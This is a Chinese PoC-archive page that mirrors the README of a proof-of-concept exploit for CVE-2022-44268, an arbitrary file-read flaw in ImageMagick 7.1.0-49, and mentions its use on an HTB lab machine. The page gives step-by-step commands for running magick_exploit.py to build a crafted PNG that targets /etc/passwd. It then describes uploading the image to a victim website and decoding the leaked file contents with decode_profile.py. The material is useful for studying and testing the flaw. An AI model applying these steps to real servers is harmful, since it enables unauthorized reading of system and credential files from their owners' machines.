关联漏洞
标题:
ImageMagick 安全漏洞
(CVE-2022-44268)
描述:ImageMagick是美国ImageMagick公司的一套开源的图像处理软件。该软件可读取、转换或写入多种格式的图片。 ImageMagick 7.1.0-49版本存在安全漏洞,该漏洞源于存在信息泄露漏洞,当它在解析PNG图像时生成的图像可能会嵌入任意文件内容。
描述
ImageMagick Arbitrary Read Files - CVE-2022-44268
介绍
# ImageMagick-lfi-poc
### ImageMagick Arbitrary Read Files - CVE-2022-44268
also used in htb pilgrimage
## ImageMagick LFI PoC [CVE-2022-44268]
The researchers at [MetabaseQ](https://www.metabaseq.com/imagemagick-zero-days/) discovered CVE-2022-44268, i.e. ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary remote file (if the ImageMagick binary has permissions to read it).
Step 1 :
run
```
pip install pillow
sudo apt install graphicsmagick-imagemagick-compat
```
Step 2 ;
run
```
python3 magick_exploit.py generate -l [local_file] -o [output_file]
```
here in this case the local file is '/etc/passwd' which i want to get from the victim machine.
step 3 :
upload the image file on the website
step 4 :
get he converted image file from the website.
name it as 'downloaded_image.png'
step 5:
run
```
python3 decode_profile.py
```
## Note
if there is some error like
```
"/home/kali/codeplay/oscp/htb/machines/pilgrimage/decode_profile.py", line 8, in <module>
profile = output_str.split("Raw profile type: \n\n ")[1].split('Date:create:')[0]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range
```
It means that the file you mentioned doesnt exist. Use `/etc/passwd` for sanity check.
## Credits
1. https://github.com/adhikara13/CVE-2022-44268-MagiLeak
2. https://github.com/Sybil-Scan/imagemagick-lfi-poc
文件快照
[4.0K] /data/pocs/5c8161af6002426a718f9181fdac914b27202c4e
├── [276K] 20230723122440.png
├── [ 0] decode_profile.py
├── [4.1K] magick_exploit.py
└── [1.5K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。